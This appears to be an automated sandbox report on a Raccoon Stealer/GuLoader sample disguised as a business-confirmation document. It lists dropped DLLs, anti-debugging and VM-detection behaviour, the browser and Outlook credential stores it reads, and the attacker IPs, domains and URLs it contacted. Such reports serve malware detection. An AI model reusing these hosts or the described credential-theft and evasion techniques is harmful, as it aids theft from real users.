Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleMarshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\qipcap.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\lgpllibs.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozMapi32_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ldif60.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\prldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozMapi32.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\breakpadinjector.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nssckbi.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleHandler.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\libEGL.dll Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Registry key enumerated: More than 152 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe TID: 6772 Thread sleep count: 193 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 6712 Thread sleep count: 86 > 30 Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853428201.0000000066C40000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853428201.0000000066C40000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798629979.000000000076A000.00000004.00000020.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849718672.0000000000561000.00000040.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853428201.0000000066C40000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853428201.0000000066C40000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process queried: DebugPort Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior

Remote Access Functionality:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 378098 Sample: CopyDocs-BUSINESS-CONFIRMAT... Startdate: 30/03/2021 Architecture: WINDOWS Score: 100 36 Multi AV Scanner detection for domain / URL 2->36 38 Found malware configuration 2->38 40 Yara detected GuLoader 2->40 42 3 other signatures 2->42 8 CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe 1 2->8         started        process3 signatures4 44 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 8->44 46 Tries to detect virtualization through RDTSC time measurements 8->46 11 CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe 80 8->11         started        process5 dnsIp6 30 telete.in 195.201.225.248, 443, 49743 HETZNER-ASDE Germany 11->30 32 45.139.236.6, 49744, 80 TEAM-HOSTASRU Russian Federation 11->32 34 ekocafebali.com 111.67.28.15, 443, 49742 DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAU Australia 11->34 22 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 11->22 dropped 24 C:\Users\user\AppData\...\vcruntime140.dll, PE32 11->24 dropped 26 C:\Users\user\AppData\...\ucrtbase.dll, PE32 11->26 dropped 28 56 other files (none is malicious) 11->28 dropped 48 Tries to steal Mail credentials (via file access) 11->48 50 Tries to harvest and steal browser information (history, passwords, etc) 11->50 52 Tries to detect Any.run 11->52 54 Hides threads from debuggers 11->54 16 cmd.exe 1 11->16         started        file7 signatures8 process9 process10 18 conhost.exe 16->18         started        20 timeout.exe 1 16->20         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.201.225.248
 telete.in Germany
24940 HETZNER-ASDE true
45.139.236.6
 unknown Russian Federation
202984 TEAM-HOSTASRU false
111.67.28.15
 ekocafebali.com Australia
55803 DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAU false

Contacted Domains

Name IP Active
telete.in 195.201.225.248 true
ekocafebali.com 111.67.28.15 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/0a3546e5040ab5a4b3cac44b064a321d51adba4a false
  • Avira URL Cloud: safe
 unknown
http://45.139.236.6/ false
  • Avira URL Cloud: safe
 unknown
http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921 false
  • Avira URL Cloud: safe
 unknown